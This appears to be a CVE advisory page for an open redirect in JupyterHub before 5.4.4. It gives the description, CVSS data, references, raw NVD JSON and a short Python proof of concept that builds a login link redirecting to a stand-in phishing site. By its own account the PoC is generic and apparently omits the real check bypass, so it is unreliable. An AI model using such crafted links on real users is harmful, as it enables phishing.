CVE-2026-33709

Description

JupyterHub is software that allows one to create a multi-user server for Jupyter notebooks. Prior to version 5.4.4, an open redirect vulnerability in JupyterHub allows attackers to construct links which, when clicked, take users to the JupyterHub login page, after which they are sent to an arbitrary attacker-controlled site outside JupyterHub instead of a JupyterHub page, bypassing JupyterHub's check to prevent this. This issue has been patched in version 5.4.4.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jupyter:jupyterhub:*:*:*:*:*:*:*:* - VULNERABLE

JupyterHub < 5.4.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Proof of Concept for CVE-2026-33709
# This script demonstrates how an attacker might craft a URL to exploit the open redirect vulnerability.

target_domain = "https://example-jupyterhub.com"
malicious_site = "https://attacker-controlled-site.com/phishing"

# Constructing the malicious payload.
# Note: The specific parameter name (e.g., 'next') depends on the implementation details of JupyterHub.
# This is a generic representation of the exploit.
exploit_url = f"{target_domain}/login?next={malicious_site}"

print(f"[+] Malicious URL generated: {exploit_url}")
print("[+] When a user clicks this link and logs in, they will be redirected to the attacker's site.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33709
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33709
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33709/
[4] VulDB https://vuldb.com/cve/CVE-2026-33709
[5] https://github.com/jupyterhub/jupyterhub/releases/tag/5.4.4
[6] https://github.com/jupyterhub/jupyterhub/security/advisories/GHSA-3vff-hjqv-m7h8

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33709", "sourceIdentifier": "[email protected]", "published": "2026-04-03T22:16:26.657", "lastModified": "2026-04-22T15:59:59.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "JupyterHub is software that allows one to create a multi-user server for Jupyter notebooks. Prior to version 5.4.4, an open redirect vulnerability in JupyterHub allows attackers to construct links which, when clicked, take users to the JupyterHub login page, after which they are sent to an arbitrary attacker-controlled site outside JupyterHub instead of a JupyterHub page, bypassing JupyterHub's check to prevent this. This issue has been patched in version 5.4.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jupyter:jupyterhub:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.4", "matchCriteriaId": "63A399BE-7434-4082-87C9-A1CCE40E8102"}]}]}], "references": [{"url": "https://github.com/jupyterhub/jupyterhub/releases/tag/5.4.4", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/jupyterhub/jupyterhub/security/advisories/GHSA-3vff-hjqv-m7h8", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}